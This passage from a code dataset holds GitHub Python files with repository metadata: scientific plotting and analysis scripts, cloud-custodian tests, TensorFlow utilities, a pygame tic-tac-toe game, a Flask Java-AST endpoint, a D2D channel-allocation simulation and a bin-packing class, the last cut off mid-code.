0.5*c[i,j+1])/hy\r\n\t\t\telse:\r\n\t\t\t\tif j == 0:\r\n\t\t\t\t\tdc[i,j] = (-1.5*c[i,j] + 2*c[i,j+1] - 0.5*c[i,j+2])/hy\r\n\t\t\t\tif j == len(x[i])-1:\r\n\t\t\t\t\t# second-order backward difference, matching finiteDiffX\r\n\t\t\t\t\tdc[i,j] = (0.5*c[i,j-2] - 2*c[i,j-1] + 1.5*c[i,j])/hy\r\n\r\n\treturn(dc)\r\n\r\nds = [yt.load(\"kh_mhd_Ma=0.803333333333At=0.0hdf5_chk_0000\"), \\\r\n\tyt.load(\"kh_mhd_Ma=0.803333333333At=0.0hdf5_chk_0001\")]\r\n\r\n# ds[0].print_stats()\r\n# ds[1].print_stats()\r\n\r\n# diffAnalysis(ds[0],ds[1],\"velx\",\"x-velocity\",\"vel$_x$ (cm$\\cdot$code length/code time)\",\"KH_velx_analysis\")\r\n# diffAnalysis(ds[0],ds[1],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_analysis\")\r\n\r\n# visualize(ds[0],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_visualization_0\")\r\n# visualize(ds[1],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_visualization_1\")\r\n\r\n# fieldAnalysis(ds[0],vorticity,\"Vorticity\",\"$\\\\vec{\\\\omega}$ (rad/second)\",\"KH_vort_log_analysis_0\")\r\n# fieldAnalysis(ds[1],vorticity,\"Vorticity\",\"$\\\\vec{\\\\omega}$ (rad/second)\",\"KH_vort_log_analysis_1\")\r\n\r\n# fieldAnalysis(ds[0],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_log_analysis_0\")\r\n# fieldAnalysis(ds[1],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_log_analysis_1\")\r\n\r\nfieldAnalysisQuiver(ds[0],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_quiv_analysis_0\")\r\nfieldAnalysisQuiver(ds[1],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_quiv_analysis_1\")","repo_name":"rjl09c/ysp2017","sub_path":"rtliu_grad_analysis.py","file_name":"rtliu_grad_analysis.py","file_ext":"py","file_size_in_byte":8809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12662948888","text":"from gcp_common import BaseTest, event_data\n\nfrom pytest_terraform import terraform\n\n\n@terraform('pubsub_topic')\ndef test_pubsub_topic_query(test, pubsub_topic):\n topic_name = pubsub_topic['google_pubsub_topic.test_topic.id']\n\n session_factory = test.replay_flight_data('pubsub-topic-query')\n\n policy = test.load_policy(\n {'name': 'gcp-pubsub-topic-dryrun',\n 'resource': 'gcp.pubsub-topic'},\n session_factory=session_factory)\n\n resource = policy.resource_manager.get_resource(\n {'project_id': test.project_id, 'topic_id': topic_name}\n )\n test.assertEqual(resource['name'], topic_name)\n\n resources = policy.run()\n topic_names = [r['name'] for r in resources]\n assert topic_name in topic_names\n\n\n@terraform('pubsub_subscription')\ndef test_pubsub_subscription_query(test, pubsub_subscription):\n subscription_name = pubsub_subscription['google_pubsub_subscription.c7n.id']\n session_factory = test.replay_flight_data('pubsub-subscription-query')\n\n policy = test.load_policy(\n {'name': 'gcp-pubsub-subscription-dryrun',\n 'resource': 'gcp.pubsub-subscription',\n 'filters': [{'name': subscription_name}]},\n session_factory=session_factory)\n\n resources = policy.run()\n test.assertEqual(resources[0]['name'], subscription_name)\n\n\nclass PubSubSubscriptionTest(BaseTest):\n def test_pubsub_subscription_get(self):\n project_id = 'cloud-custodian'\n subscription_name = 'custodian'\n resource_name = 'projects/{}/subscriptions/{}'.format(project_id, subscription_name)\n session_factory = self.replay_flight_data(\n 'pubsub-subscription-get', project_id=project_id)\n\n policy = self.load_policy(\n {'name': 'gcp-pubsub-subscription-audit',\n 'resource': 'gcp.pubsub-subscription',\n 'mode': {\n 'type': 'gcp-audit',\n 'methods': ['google.pubsub.v1.Subscriber.CreateSubscription']\n }},\n session_factory=session_factory)\n\n exec_mode = policy.get_execution_mode()\n event = event_data('pubsub-subscription-create.json')\n resources = exec_mode.run(event, None)\n self.assertEqual(resources[0]['name'], resource_name)\n\n\nclass PubSubSnapshotTest(BaseTest):\n\n def test_pubsub_snapshot_query(self):\n project_id = 'cloud-custodian'\n pubsub_snapshot_name = 'projects/cloud-custodian/snapshots/custodian'\n session_factory = self.replay_flight_data(\n 'pubsub-snapshot-query', project_id=project_id)\n\n policy = self.load_policy(\n {'name': 'gcp-pubsub-snapshot-dryrun',\n 'resource': 'gcp.pubsub-snapshot'},\n session_factory=session_factory)\n\n pubsub_snapshot_resources = policy.run()\n self.assertEqual(pubsub_snapshot_resources[0]['name'], pubsub_snapshot_name)\n","repo_name":"gustcol/Canivete","sub_path":"cloud-custodian/tools/c7n_gcp/tests/test_pubsub.py","file_name":"test_pubsub.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"41585102425","text":"import tensorflow as tf\nimport math\n\n\ndef save_model(root, checkpoint_prefix):\n root.save(file_prefix=checkpoint_prefix)\n\n\ndef tf_record_parser(record):\n keys_to_features = {\n \"image\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"height\": tf.FixedLenFeature((), tf.int64),\n \"width\": tf.FixedLenFeature((), tf.int64)\n }\n\n features = tf.parse_single_example(record, keys_to_features)\n\n height = tf.cast(features['height'], tf.int64)\n width = tf.cast(features['width'], tf.int64)\n image = tf.decode_raw(features['image'], tf.uint8)\n\n # reshape input and annotation images\n image = tf.reshape(image, (height, width, 3), name=\"image_reshape\")\n image = tf.image.random_flip_left_right(image)\n image = tf.image.resize_image_with_crop_or_pad(image, 128, 128)\n # image = tf.contrib.image.rotate([image], tf.random_uniform(\n # [1], maxval=math.pi / 10))[0]\n return tf.to_float(image)\n\n\ndef normalizer(image, dtype):\n # Not sure which one works better yet\n image = tf.cast(image, dtype=dtype) / 255.0 - 0.5\n # image = tf.cast(image, dtype=dtype) / 128.0 - 1.0\n # noise addition normalization\n image += tf.random_uniform(shape=tf.shape(image),\n minval=0., maxval=1./128., dtype=dtype)\n\n return image\n","repo_name":"settinghead/eager_gans","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28756468211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 30 12:19:44 2022\n\n@author: User\n\"\"\"\n\n\"\"\"\ntaking name from user and writing it to guest.txt file\n\"\"\"\nname = input(\"What's your name? \")\n\nfilename = 'guest.txt'\nwith open(filename,'w') as file:\n file.write(name)","repo_name":"RaisaAzad/Problem-Solving","sub_path":"writing_name.py","file_name":"writing_name.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"24662759045","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import fields, models\r\n\r\n\r\nclass Vehicle_Brand(models.Model):\r\n _name = 'vehicletest_brand'\r\n _description = 'brand'\r\n\r\n name = fields.Char(\r\n string='Brand Name',\r\n required=True,\r\n help=\"Fill brand name\"\r\n )\r\n\r\n description = fields.Text(\r\n string='Description',\r\n )\r\n\r\n active = fields.Boolean(\r\n string='Active'\r\n )\r\n \r\n \r\n\r\n ","repo_name":"hmzhmrgh/test","sub_path":"vehicletest/models/vehicle_brand.py","file_name":"vehicle_brand.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"8719198987","text":"import pygame\nfrom engine import Jeu\n\nWIDTH = 500\nHEIGHT = 500\nBLANC = (255,255,255)\nNOIR = (0,0,0)\n\npygame.init()\n\njeu = Jeu()\n\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"morpion\")\n\nbg = pygame.Surface((WIDTH,HEIGHT))\nbg.fill(BLANC)\npygame.draw.line(bg, NOIR, (0,HEIGHT/3), (WIDTH,HEIGHT/3), 3)\npygame.draw.line(bg, NOIR, (0,2*HEIGHT/3), (WIDTH,2*HEIGHT/3), 3)\npygame.draw.line(bg, NOIR, (WIDTH/3,0), (WIDTH/3,HEIGHT), 3)\npygame.draw.line(bg, NOIR, (2*WIDTH/3,0), (2*WIDTH/3,HEIGHT), 3)\n\nw = WIDTH/3-4\nh = HEIGHT/3-4\ncroix = pygame.Surface((w,h))\ncroix.fill(BLANC)\npygame.draw.line(croix, NOIR, (w/4, h/4), (3*w/4, 3*h/4), 3)\npygame.draw.line(croix, NOIR, (w/4, 3*h/4), (3*w/4, h/4), 3)\n\ncercle = pygame.Surface((w,h))\ncercle.fill(BLANC)\npygame.draw.circle(cercle, NOIR, (int(w//2), int(h//2)), int(3*w//8), 3)\n\nclock = pygame.time.Clock()\n\ncontinuer = True\nwhile continuer:\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n continuer = False\n elif e.type == pygame.MOUSEBUTTONUP and not jeu.fin[0]:\n position = e.pos\n colonne = int(position[0]//(WIDTH/3))\n ligne = int(position[1]//(HEIGHT/3))\n jeu.maj(colonne, ligne)\n screen.blit(bg, (0,0))\n for i in range(len(jeu.plateau)):\n for j in range(len(jeu.plateau[i])):\n if jeu.plateau[i][j]==1:\n screen.blit(croix, (j*WIDTH/3+2, i*HEIGHT/3+2))\n elif jeu.plateau[i][j]==2:\n screen.blit(cercle, (j*WIDTH/3+2, i*HEIGHT/3+2))\n\n if jeu.fin[0]:\n pygame.display.set_caption(\"Victoire \"+str(jeu.fin[1]))\n\n pygame.display.flip()\n\n clock.tick(30)\n\npygame.quit()\nquit()\n","repo_name":"guillaumecresp/exp_hub","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70116223345","text":"#written by Jared Arzate\nimport sys\nimport os\nimport defs\nsys.path.append(defs.func_dir)\nsys.path.append(defs.in_dir)\n\nimport generic_functions as gf\nimport umame_functions as uf\nimport numpy as np\nfrom pathlib import Path\n\n\ndef main():\n print(f\"using\",defs.out_dir,\"as output path.\")\n print(f\"and\",defs.in_dir,\"as input path.\")\n\n path,data_dir,output_dir,output_file = gf.get_input()\n\n ####\n print(\"enter number of temps\")\n num_temps = int(input())\n print(\"enter number of iterations\")\n num_iters = int(input())\n\n print(\"\\nenter the column indeces to extract.\")\n print(\"as a tuple: \")\n in_str=input()\n indeces = tuple((int(in_str[1]), int(in_str[3]), int(in_str[5])) )\n\n label = uf.parse_filename_umame()\n ##### cat all files\n master_x = np.zeros((num_temps,num_iters))\n master_y = np.zeros((num_temps,num_iters))\n master_z = np.zeros((num_temps,num_iters))\n print(\"parsing file contents...\")\n iter_val = 0 #will be incremented to access all files\n temp_val = 0 #will be incremented to access all files\n for i in range(num_temps):\n temp_to_append = str(temp_val)\n while len(temp_to_append) < 7: temp_to_append = '0' + temp_to_append\n\n for j in range(num_iters):\n #assumes your inputting the file name correctly...\n iter_to_append = str(iter_val)\n while len(iter_to_append) < 5: iter_to_append = '0' + iter_to_append\n file_name = label + temp_to_append + \"_\" + iter_to_append + \".txt\" \n print(file_name)\n file_path = path / file_name\n master_x[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[0]))\n master_y[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[1]))\n master_z[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[2]))\n #next file, if exists\n iter_val += 1 \n temp_val += 1\n iter_val = 0\n\n x = np.transpose(gf.order_data(master_x.flatten(),num_temps,num_iters))\n y = np.transpose(gf.order_data(master_y.flatten(),num_temps,num_iters))\n z = np.transpose(gf.order_data(master_z.flatten(),num_temps,num_iters)) \n\n gf.write_out(output_dir, output_file, x,y,z,indeces)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaredArz/mx3_and_uMaME_process","sub_path":"umame_cat_main.py","file_name":"umame_cat_main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12600551480","text":"\"\"\"\nMatplotlib 3D 使用\n 1. 创建3D坐标轴\n 2. 绘制散点图\n 3. 绘制3d曲线\n 4. 绘制3d曲面\n 5. 绘制等高线\n 6. 随机散点图\n 7. 随机散点图\n 8. 绘制3D表面图\n 9. 空间文字\n 10.3D柱状图\n\"\"\"\n\n\n# 创建3d坐标轴\ndef create_axes():\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n ax1 = plt.axes(projection='3d')\n ax2 = Axes3D(fig) # 效果和上一行相同\n # ax = fig.add_subplot(111,projection='3d') # 使用这种方式可以创建多个3d图形\n plt.show()\n\n\n# 绘制散点图\ndef points():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n zd = 13 * np.random.random(100)\n xd = 5 * np.sin(zd)\n yd = 5 * np.cos(zd)\n ax1 = plt.axes(projection='3d')\n ax1.scatter3D(xd, yd, zd, cmap='Blues')\n plt.show()\n\n\n# 绘制3d曲线\ndef curvilinear():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n z = np.linspace(0, 13, 1000)\n x = 5 * np.sin(z)\n y = 5 * np.cos(z)\n ax1 = plt.axes(projection='3d')\n ax1.plot3D(x, y, z, 'gray')\n plt.show()\n\n\n# 绘制3d曲面\ndef curved_surface():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n\n fig = plt.figure() # 定义新的三维坐标轴\n ax3 = plt.axes(projection='3d')\n\n # 定义三维数据\n z = np.linspace(0, 13, 1000)\n x = 5 * np.sin(z)\n y = 5 * np.cos(z)\n xx = np.arange(-10, 10, 100)\n yy = np.arange(-10, 10, 100)\n X, Y = np.meshgrid(x, y)\n Z = np.sin(X) + np.cos(Y)\n # 作图\n # rstride, cstride 为作图的步长,数值越小图片越清晰,需要的资源越大\n ax3.plot_surface(X, Y, Z, rstride=50, cstride=50, cmap='rainbow')\n # ax3.contour(X,Y,Z, zdim='z',offset=-2,cmap='rainbow') # 等高线图,要设置offset,为Z的最小值\n plt.show()\n\n\n# 绘制等高线\ndef contour():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n xx = np.arange(-5, 5, 0.1)\n yy = np.arange(-5, 5, 0.1)\n X, Y = np.meshgrid(xx, yy)\n Z = np.sin(np.sqrt(X ** 2 + Y ** 2))\n # 作图\n ax4 = plt.axes(projection='3d')\n ax4.plot_surface(X, Y, Z, alpha=0.3, cmap='winter') # 生成表面, alpha 用于控制透明度\n ax4.contour(X, Y, Z, zdir='z', offset=-3, cmap=\"rainbow\") # 生成z方向投影,投到x-y平面\n ax4.contour(X, Y, Z, zdir='x', offset=-6, cmap=\"rainbow\") # 生成x方向投影,投到y-z平面\n ax4.contour(X, Y, Z, zdir='y', offset=6, cmap=\"rainbow\") # 生成y方向投影,投到x-z平面\n # ax4.contourf(X,Y,Z,zdir='y', offset=6,cmap=\"rainbow\") #生成y方向投影填充,投到x-z平面,contourf()函数\n # 设定显示范围\n ax4.set_xlabel('X')\n ax4.set_xlim(-6, 4) # 拉开坐标轴范围显示投影\n ax4.set_ylabel('Y')\n ax4.set_ylim(-4, 6)\n ax4.set_zlabel('Z')\n ax4.set_zlim(-3, 3)\n plt.show()\n\n\n# 随机散点图\ndef random_point():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n #定义坐标轴\n fig4 = plt.figure()\n ax4 = plt.axes(projection='3d')\n #生成三维数据\n xx = np.random.random(20)*10-5 #取100个随机数,范围在5~5之间\n yy = np.random.random(20)*10-5\n X, Y = np.meshgrid(xx, yy)\n Z = np.sin(np.sqrt(X**2+Y**2))\n # 作图\n ax4.scatter(X,Y,Z,alpha=0.3,c=np.random.random(400),s=np.random.randint(10,20, size=(20, 40))) #生成散点.利用c控制颜色序列,s控制大小\n # 设定显示范围\n plt.show()\n\n\n# 绘制3D表面图\ndef surface():\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n import numpy as np\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n x = 10 * np.outer(np.cos(u), np.sin(v))\n y = 10 * np.outer(np.sin(u), np.sin(v))\n z = 10 * np.outer(np.ones(np.size(u)), np.cos(v))\n\n ax.plot_surface(x, y, z, color='b')\n plt.show()\n\n\n# 空间文字\ndef text_3d():\n from 
mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n zdirs = (None, 'x', 'y', 'z', (1, 1, 0), (1, 1, 1))\n xs = (1, 4, 4, 9, 4, 1)\n ys = (2, 5, 8, 10, 1, 2)\n zs = (10, 3, 8, 9, 1, 8)\n for zdir, x, y, z in zip(zdirs, xs, ys, zs):\n label = '(%d, %d, %d), dir=%s' % (x, y, z, zdir)\n ax.text(x, y, z, label, zdir)\n ax.text(9, 0, 0, \"red\", color='red')\n ax.text2D(0.05, 0.95, \"2D Text\", transform=ax.transAxes)\n ax.set_xlim(0, 10)\n ax.set_ylim(0, 10)\n ax.set_zlim(0, 10)\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n plt.show()\n\n\n# 3d 柱状图\ndef bar_3d():\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n import numpy as np\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n for c, z in zip(['r', 'g', 'b', 'y'], [30, 20, 10, 0]):\n xs = np.arange(20)\n ys = np.random.rand(20)\n # You can provide either a single color or an array. To demonstrate this,\n # the first bar of each set will be colored cyan.\n cs = [c] * len(xs)\n cs[0] = 'c'\n ax.bar(xs, ys, zs=z, zdir='y', color=cs, alpha=0.8)\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n plt.show()\n\n\n# create_axes()\n# points()\n# curvilinear()\n# curved_surface()\n# contour()\n# random_point()\n# surface()\n# text_3d()\nbar_3d()\n","repo_name":"StarkTan/Python","sub_path":"Matplotlib/example/basic_use_3d.py","file_name":"basic_use_3d.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28956671467","text":"import sys\nimport os\n\nsys.path.append(os.path.abspath(\".\"))\nsys.dont_write_bytecode = True\n\n__author__ = \"COSAL\"\n\nfrom mos.search.tree import java_tree\n\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return \"Hello World\"\n\n\n@app.route(\"/java/ast\", methods=[\"POST\"])\ndef get_java_ast():\n java_code = request.form[\"code\"]\n ret_obj = {}\n try:\n code_ast = java_tree.parse_content(java_code)\n ret_obj = {\n \"status\": 200,\n \"ast\": code_ast\n }\n except Exception as e:\n print(e)\n ret_obj = {\n \"status\": 500,\n \"error_msg\": e.message\n }\n return jsonify(ret_obj)\n\n\nif __name__ == \"__main__\":\n app.run(port=5000)\n","repo_name":"DynamicCodeSearch/COSAL","sub_path":"code/src/main/python/mos/api/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"4874839207","text":"import sys\nimport numpy as np\nimport random as rand\nfrom numpy.random import uniform, exponential, normal\nimport math\nimport time\nimport matplotlib.pyplot as plt\n\nfrom core.config import Cell_Model, D2D, Cellular_UE, Channel\n\n\ndef initial_user_locations(cell):\n\n d_cell_users = []\n d_d2d_users = [[[0, 0], [0, 0]] for _ in range(cell.d2d_pairs)]\n \n '''Initially we assign the locations of all the cellular users \n as well as the d2d sender.'''\n radius_list = list(uniform(0, cell.cell_radius, \n (cell.d2d_pairs + cell.cell_users)))\n theta_list = list(uniform(0, 360, (cell.d2d_pairs + cell.cell_users)))\n for i in range(cell.d2d_pairs + cell.cell_users):\n d_cell_users.append([radius_list[i], theta_list[i]])\n #Shuffling all the users so that the d2d users can be selected randomly\n rand.shuffle(d_cell_users)\n for i in range(cell.d2d_pairs):\n d_d2d_users[i][0][0] = d_cell_users[0][0]\n d_d2d_users[i][0][1] = d_cell_users[0][1]\n d_d2d_users[i][1][0] = uniform(0, cell.d2d_radius)\n d_d2d_users[i][1][1] = uniform(0, 360)\n d_cell_users.remove(d_cell_users[0])\n\n # Initializing Shadow fading for both cellular and d2d\n shadow_fading_d2d = normal(0, 12, cell.d2d_pairs)\n shadow_fading_cell = normal(0, 10, cell.cell_users)\n \n for i in range(cell.cell_users):\n ue = Cellular_UE(i+1, d_cell_users[i], cell.cell_radius, \n cell.del_cell_rad, cell.del_theta, shadow_fading_cell[i])\n #ue.shadow_fading = shadow_fading_cell[i] #Assigning S.F. to UEs\n cell.cellular_list.append(ue)\n \n for i in range(cell.d2d_pairs):\n d2d = D2D(i+1, d_d2d_users[i][0], d_d2d_users[i][1], \n cell.cell_radius, cell.d2d_radius, cell.del_cell_rad, \n cell.del_d2d_rad, cell.del_theta, shadow_fading_d2d[i])\n #d2d.shadow_fading = shadow_fading_d2d[i] #Assigning S.F. 
to D2Ds\n        cell.d2d_list.append(d2d)\n\n    #print(d_cell_users)\n    #print(d_d2d_users)\n\n    return cell, d_cell_users, d_d2d_users, shadow_fading_cell, shadow_fading_d2d\n\n\ndef init_channels(cell):\n\n    #Initialize the channels\n    for i in range(cell.channels):\n        ch = Channel(i+1)\n        if (i+1) <= cell.cell_users:\n            ch.cell = ch.id\n        cell.channel_list.append(ch)\n\n    return cell\n\ndef allocate(cell):\n    i = 0\n    for ch in cell.channel_list:\n        ch.d2d = ch.id\n        i += 1\n    while i < len(cell.d2d_list):\n        cell.unallocated_d2d.append(i+1)\n        i += 1\n\n    return cell\n\ndef copy_initial_data(cell, d_cell_users, d_d2d_users, sf_cell, sf_d2d):\n\n    for location, value in enumerate(d_cell_users):\n        cellular = Cellular_UE(location + 1, value, cell.cell_radius, \n                    cell.del_cell_rad, cell.del_theta, \n                    sf_cell[location])\n        cell.cellular_list.append(cellular)\n\n    for location, value in enumerate(d_d2d_users):\n        d2d = D2D(location + 1, value[0], value[1], cell.cell_radius, \n                cell.d2d_radius, cell.del_cell_rad, cell.del_d2d_rad, \n                cell.del_theta, sf_d2d[location])\n        cell.d2d_list.append(d2d)\n\n    return cell\n\ndef swap(cell, shared_channels, dedicated_channels, iteration):\n\n    if iteration != 1:  # '!=' compares values; 'is not' checks object identity\n        min_throughput = shared_channels[0].throughput \n        shared_location = 0\n        for i in range(len(shared_channels)):\n            if min_throughput >= shared_channels[i].throughput:\n                shared_location = i\n                min_throughput = shared_channels[i].throughput\n\n        min_throughput = dedicated_channels[0].throughput \n        dedicated_location = 0\n        for i in range(len(dedicated_channels)):\n            if min_throughput >= dedicated_channels[i].throughput:\n                dedicated_location = i\n                min_throughput = dedicated_channels[i].throughput\n\n        cell.unallocated_d2d.append(shared_channels[shared_location].d2d)\n        print('D2D {} of Shared Channel {} Unallocated'.format(shared_channels[shared_location].d2d, \n                                                    shared_channels[shared_location].id))\n\n        shared_channels[shared_location].d2d = dedicated_channels[dedicated_location].d2d \n        shared_channels[shared_location].reward = None\n        shared_channels[shared_location].freshness = 0 #Initialize freshness to 0\n        print('D2D {} of Dedicated Channel {} to Shared Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n                                                    dedicated_channels[dedicated_location].id, \n                                                    shared_channels[shared_location].id))\n\n        dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n        print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n                                                    dedicated_channels[dedicated_location].id))\n\n\n    return cell, shared_channels, dedicated_channels\n\n\ndef swap_new(cell, shared_channels, dedicated_channels, iteration):\n\n    reward_thres = 500\n\n    if iteration != 1:  # '!=' compares values; 'is not' checks object identity\n        min_reward = shared_channels[0].reward\n        shared_location = None\n        for i in range(len(shared_channels)):\n            print('Reward for channel {} is {}'.format(shared_channels[i].id, \n                                shared_channels[i].reward))\n            if int(shared_channels[i].reward) < reward_thres:\n                if min_reward >= shared_channels[i].reward:\n                    shared_location = i\n                    min_reward = shared_channels[i].reward\n\n        min_throughput = dedicated_channels[0].throughput \n        dedicated_location = 0\n        for i in range(len(dedicated_channels)):\n            if min_throughput >= dedicated_channels[i].throughput:\n                dedicated_location = i\n                min_throughput = dedicated_channels[i].throughput\n\n        if shared_location is not None:\n            cell.unallocated_d2d.append(shared_channels[shared_location].d2d)\n            print('D2D {} of Shared Channel {} Unallocated'.format(shared_channels[shared_location].d2d, \n
shared_channels[shared_location].id))\n\n shared_channels[shared_location].d2d = dedicated_channels[dedicated_location].d2d \n shared_channels[shared_location].reward = None\n shared_channels[shared_location].freshness = 0 #Initialize freshness to 0\n print('D2D {} of Dedicated Channel {} to Shared Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id, \n shared_channels[shared_location].id))\n\n dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n cell.channel_list[shared_channels[shared_location].id - 1] = shared_channels[shared_location]\n\n else:\n\n cell.unallocated_d2d.append(dedicated_channels[dedicated_location].d2d)\n print('D2D {} of Dedicated Channel {} Unallocated'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n\n return cell, shared_channels, dedicated_channels","repo_name":"AnirbanBanik1998/SPARQ","sub_path":"SPARQ/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"4817693006","text":"idade = sexo = contadorHomens = contadorIdade = contadorMulheres = 0\n\nwhile True:\n idade = int(input('Digite sua idade por favor: '))\n if idade > 18:\n contadorIdade += 1\n\n sexo = input('Certo... Agora me informe seu sexo biológico: ').strip().upper()[0]\n if sexo == \"M\":\n contadorHomens += 1\n if sexo == \"F\" and idade < 20:\n contadorMulheres += 1\n\n continuar = input('\\nDeseja continuar cadastrando? [S/N]: \\n').strip().upper()[0]\n if continuar == \"N\":\n break \n\nprint(f\"\\nForam cadastrados {contadorHomens} homens.\\n{contadorIdade} pessoas tem mais de 18 anos.\\n{contadorMulheres} mulheres tem menos de 20 anos.\")","repo_name":"antonio00/blue-vscode","sub_path":"MODULO 01/AULA 12/rascunhos.py","file_name":"rascunhos.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18404027506","text":"\r\nimport random\r\n\r\n\r\nclass BinPackerNode:\r\n def __init__(self, x=0, y=0, width=0,height=0, data=None, left=None,right=None):\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.data = data\r\n self.left = left\r\n self.right = right\r\n\r\n def split(self, data, width, height):\r\n self.data = data\r\n self.left = BinPackerNode(self.x,self.y+height, self.width, self.height-height)\r\n self.right = BinPackerNode(self.x+width,self.y, self.width-width, height)\r\n return self\r\n \r\n @staticmethod\r\n def find(node, width, height):\r\n if node.data:\r\n return BinPackerNode.find(node.right, width, height) or BinPackerNode.find(node.left, width, height)\r\n elif width <= node.width and height <= node.height:\r\n return node\r\n return None\r\n\r\n\r\nclass BinPacker:\r\n def __init__(self, width, height):\r\n self.root = BinPackerNode(0,0,width,height)\r\n \r\n cbsort = {\r\n \"w\": (lambda a,b: b[\"width\"] - a[\"width\"]),\r\n \"h\": (lambda a,b: b[\"height\"] - a[\"height\"]),\r\n \"a\": (lambda a,b: b[\"width\"]*b[\"height\"] - a[\"width\"]*a[\"height\"]),\r\n \"max\": (lambda a,b: max(b[\"width\"], b[\"height\"]) - max(a[\"width\"], a[\"height\"])),\r\n \"min\": (lambda a,b: min(b[\"width\"], b[\"height\"]) - min(a[\"width\"], a[\"height\"])),\r\n \"random\": (lambda a,b: random.random() - 0.5),\r\n \"height\": (lambda a,b: BinPacker.msort(a, b, ['h','w'])),\r\n \"width\": (lambda a,b: BinPacker.msort(a, b, ['w','h'])),\r\n \"area\": (lambda a,b: BinPacker.msort(a, b, ['a','h','w'])),\r\n \"maxside\": (lambda a,b: BinPacker.msort(a, b, ['max','min','h','w'])),\r\n }\r\n \r\n @staticmethod\r\n def msort(a, b, criteria):\r\n diff = 0\r\n for n in range(len(criteria)):\r\n diff = BinPacker.cbsort[criteria[n]](a,b)\r\n if diff != 0:\r\n break\r\n return diff\r\n \r\n @staticmethod\r\n def swap(a,i,j):\r\n t = a[i]\r\n a[i] = a[j]\r\n a[j] = t\r\n\r\n @staticmethod\r\n def sort(arr, criteria = ['height']):\r\n for i in range(0, 